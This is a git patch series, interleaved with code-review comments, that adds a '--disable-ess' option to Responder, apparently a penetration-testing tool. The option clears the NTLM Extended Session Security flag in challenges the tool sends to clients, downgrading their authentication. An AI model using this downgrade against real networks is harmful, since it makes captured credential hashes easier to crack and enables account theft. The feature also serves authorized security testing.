From baf80aa4f0e1aaf9ee81ffe6b0b5089d39f42516 Mon Sep 17 00:00:00 2001
From: pixis
Date: Fri, 14 May 2021 11:45:18 +0200
Subject: [PATCH 1/3] Add ESS downgrade parameter
---
 README.md | 1 +
 Responder.py | 1 +
 packets.py | 6 +++---
 settings.py | 1 +
 utils.py | 1 +
 5 files changed, 7 insertions(+), 3 deletions(-)
diff --git a/README.md b/README.md
index 44a8baa..bc14d7c 100644
--- a/README.md
+++ b/README.md
@@ -163,6 +163,7 @@ Options:
 with -r. Default: Off
 --lm Force LM hashing downgrade for Windows XP/2003 and earlier. Default: Off
+ --disable-ess Force ESS downgrade. Default: Off
 -v, --verbose Increase verbosity.
diff --git a/Responder.py b/Responder.py
index 2b62977..302bdf1 100755
--- a/Responder.py
+++ b/Responder.py
@@ -43,6 +43,7 @@ parser.add_option('-F','--ForceWpadAuth', action="store_true", help="Force NTLM
 parser.add_option('-P','--ProxyAuth', action="store_true", help="Force NTLM (transparently)/Basic (prompt) authentication for the proxy. WPAD doesn't need to be ON. This option is highly effective when combined with -r. Default: False", dest="ProxyAuth_On_Off", default=False)
 parser.add_option('--lm', action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier. Default: False", dest="LM_On_Off", default=False)
+parser.add_option('--disable-ess', action="store_true", help="Force ESS downgrade. Default: False", dest="NOESS_On_Off", default=False)
 parser.add_option('-v','--verbose', action="store_true", help="Increase verbosity.", dest="Verbose")
 options, args = parser.parse_args()
diff --git a/packets.py b/packets.py
index 77036bd..4f5acb3 100644
--- a/packets.py
+++ b/packets.py
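Review bot: The help string for the new `--disable-ess` option says only "Force ESS downgrade", which tells an operator neither what changes in the challenge nor which clients are affected, while the README sentence added in PATCH 2/3 does say it disables extended session security for NTLMv1 authentication. The option line should carry the same information so that `--help` and the README agree, e.g. `help="Disable NTLM Extended Session Security (clears NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY in the server challenge); affects NTLMv1 clients only. Default: False"`. The surrounding `parser.add_option` calls are module-level statements, so there is no enclosing function.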
@@ -791,7 +791,7 @@ class LDAPNTLMChallenge(Packet):
 ("NTLMSSPNtWorkstationLen", "\x1e\x00"),
 ("NTLMSSPNtWorkstationMaxLen", "\x1e\x00"),
 ("NTLMSSPNtWorkstationBuffOffset", "\x38\x00\x00\x00"),
- ("NTLMSSPNtNegotiateFlags", "\x15\x82\x89\xe2"),
+ ("NTLMSSPNtNegotiateFlags", "\x15\x82\x81\xe2" if settings.Config.NOESS_On_Off else "\x15\x82\x89\xe2"),
 ("NTLMSSPNtServerChallenge", "\x81\x22\x33\x34\x55\x46\xe7\x88"),
 ("NTLMSSPNtReserved", "\x00\x00\x00\x00\x00\x00\x00\x00"),
 ("NTLMSSPNtTargetInfoLen", "\x94\x00"),
@@ -1331,7 +1331,7 @@ class SMBSession1Data(Packet):
 ("NTLMSSPNtWorkstationLen","\x1e\x00"),
 ("NTLMSSPNtWorkstationMaxLen","\x1e\x00"),
 ("NTLMSSPNtWorkstationBuffOffset","\x38\x00\x00\x00"),
- ("NTLMSSPNtNegotiateFlags","\x15\x82\x89\xe2"),
+ ("NTLMSSPNtNegotiateFlags","\x15\x82\x81\xe2" if settings.Config.NOESS_On_Off else "\x15\x82\x89\xe2"),
 ("NTLMSSPNtServerChallenge","\x81\x22\x33\x34\x55\x46\xe7\x88"),
 ("NTLMSSPNtReserved","\x00\x00\x00\x00\x00\x00\x00\x00"),
 ("NTLMSSPNtTargetInfoLen","\x94\x00"),
@@ -1651,7 +1651,7 @@ class SMB2Session1Data(Packet):
 ("NTLMSSPNtWorkstationLen","\x1e\x00"),
 ("NTLMSSPNtWorkstationMaxLen","\x1e\x00"),
 ("NTLMSSPNtWorkstationBuffOffset","\x38\x00\x00\x00"),
- ("NTLMSSPNtNegotiateFlags","\x15\x82\x89\xe2"),
+ ("NTLMSSPNtNegotiateFlags","\x15\x82\x81\xe2" if settings.Config.NOESS_On_Off else "\x15\x82\x89\xe2"),
 ("NTLMSSPNtServerChallenge","\x81\x22\x33\x34\x55\x46\xe7\x88"),
 ("NTLMSSPNtReserved","\x00\x00\x00\x00\x00\x00\x00\x00"),
 ("NTLMSSPNtTargetInfoLen","\x94\x00"),
diff --git a/settings.py b/settings.py
index b96f127..3c02527 100644
--- a/settings.py
+++ b/settings.py
@@ -176,6 +176,7 @@ class Settings:
 # CLI options
 self.ExternalIP = options.ExternalIP
 self.LM_On_Off = options.LM_On_Off
+ self.NOESS_On_Off = options.NOESS_On_Off
 self.WPAD_On_Off = options.WPAD_On_Off
 self.Wredirect = options.Wredirect
 self.NBTNSDomain = options.NBTNSDomain
diff --git a/utils.py b/utils.py
index 7a71c83..7045d18 100644
--- a/utils.py
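Review bot: The conditional on `settings.Config.NOESS_On_Off` is pasted verbatim into three class-level field lists (this hunk and the hunks at `@@ -1331` and `@@ -1651`), so there are now three places that must agree on two magic byte strings, and nothing records which bit they differ in. The difference between 0x89 and 0x81 in the third byte is bit 19 of the little-endian NegotiateFlags word, NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY (0x00080000); a single helper that returns the flags and carries that comment keeps one definition, and each field list then reads `("NTLMSSPNtNegotiateFlags", NtlmNegotiateFlags()),`. Note that an expression in a class body is evaluated when packets.py is imported, not when a challenge is built, so if the Settings object is populated after that import (the import order is not visible here) the attribute lookup fails at import time and later changes to the flag are not seen; in that case the call belongs where the packet is instantiated rather than in the field list. The three classes start before and end after their hunks.

```python
def NtlmNegotiateFlags():
    # Third byte 0x89 vs 0x81: the 0x08 bit is bit 19 of the little-endian
    # NegotiateFlags word, NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY (0x00080000).
    # --disable-ess clears only that bit; every other flag is unchanged.
    if settings.Config.NOESS_On_Off:
        return "\x15\x82\x81\xe2"
    return "\x15\x82\x89\xe2"

# … unchanged: LDAPNTLMChallenge, SMBSession1Data and SMB2Session1Data field lists,
#   each now holding ("NTLMSSPNtNegotiateFlags", NtlmNegotiateFlags()) …
```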
+++ b/utils.py
@@ -403,6 +403,7 @@ def StartupMessage():
 print(' %-27s' % "Force WPAD auth" + (enabled if settings.Config.Force_WPAD_Auth else disabled))
 print(' %-27s' % "Force Basic Auth" + (enabled if settings.Config.Basic else disabled))
 print(' %-27s' % "Force LM downgrade" + (enabled if settings.Config.LM_On_Off == True else disabled))
+ print(' %-27s' % "Force ESS downgrade" + (enabled if settings.Config.NOESS_On_Off == True else disabled))
 print(' %-27s' % "Fingerprint hosts" + (enabled if settings.Config.Finger_On_Off == True else disabled))
 print('')
From 51f8ab43682973df32534ca97c99fb1318a0c77d Mon Sep 17 00:00:00 2001
From: Pixis
Date: Sun, 16 May 2021 09:54:21 +0200
Subject: [PATCH 2/3] Add ESS disabling information
---
 README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index bc14d7c..9f09906 100644
--- a/README.md
+++ b/README.md
@@ -16,7 +16,7 @@ The concept behind this is to target our answers, and be stealthier on the netwo
 - Built-in SMB Auth server.
-Supports NTLMv1, NTLMv2 hashes with Extended Security NTLMSSP by default. Successfully tested from Windows 95 to Server 2022, Samba and Mac OSX Lion. Clear text password is supported for NT4, and LM hashing downgrade when the --lm option is set. SMBv2 has also been implemented and is supported by default.
+Supports NTLMv1, NTLMv2 hashes with Extended Security NTLMSSP by default. Successfully tested from Windows 95 to Server 2022, Samba and Mac OSX Lion. Clear text password is supported for NT4, and LM hashing downgrade when the --lm option is set. If --disable-ess is set, extended session security will be disabled for NTLMv1 authentication. SMBv2 has also been implemented and is supported by default.
 - Built-in MSSQL Auth server.
From dcb80d992e385a0f0fdd3f724a0b040a42439306 Mon Sep 17 00:00:00 2001
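Review bot: The new banner line tests `settings.Config.NOESS_On_Off == True` where the `Force WPAD auth` and `Force Basic Auth` lines two rows above test the attribute's truth value directly; the `== True` form is copied from the `Force LM downgrade` line but is the minority style in this block, and PATCH 3/3 rewrites the same line and keeps it. `enabled if settings.Config.NOESS_On_Off else disabled` reads the same and drops the redundant comparison. StartupMessage begins before this hunk.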
From: Pixis
Date: Sun, 16 May 2021 09:55:32 +0200
Subject: [PATCH 3/3] Add --lm switch for ESS downgrade
---
 utils.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/utils.py b/utils.py
index 7045d18..f805279 100644
--- a/utils.py
+++ b/utils.py
@@ -403,7 +403,7 @@ def StartupMessage():
 print(' %-27s' % "Force WPAD auth" + (enabled if settings.Config.Force_WPAD_Auth else disabled))
 print(' %-27s' % "Force Basic Auth" + (enabled if settings.Config.Basic else disabled))
 print(' %-27s' % "Force LM downgrade" + (enabled if settings.Config.LM_On_Off == True else disabled))
- print(' %-27s' % "Force ESS downgrade" + (enabled if settings.Config.NOESS_On_Off == True else disabled))
+ print(' %-27s' % "Force ESS downgrade" + (enabled if settings.Config.NOESS_On_Off == True or settings.Config.LM_On_Off == True else disabled))
 print(' %-27s' % "Fingerprint hosts" + (enabled if settings.Config.Finger_On_Off == True else disabled))
 print('')
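Review bot: After this change the banner reports "Force ESS downgrade" as enabled whenever `--lm` is given, but the flag bytes in packets.py (PATCH 1/3) are switched only on `settings.Config.NOESS_On_Off`, so unless the LM path clears extended session security somewhere not shown here, the banner claims a downgrade that the challenge does not actually send. If `--lm` is meant to imply the ESS downgrade, derive that once where the setting is stored, `self.NOESS_On_Off = options.NOESS_On_Off or options.LM_On_Off` in settings.py, so that this line and packets.py read the same value; this line then shrinks back to `enabled if settings.Config.NOESS_On_Off else disabled`. StartupMessage begins before this hunk.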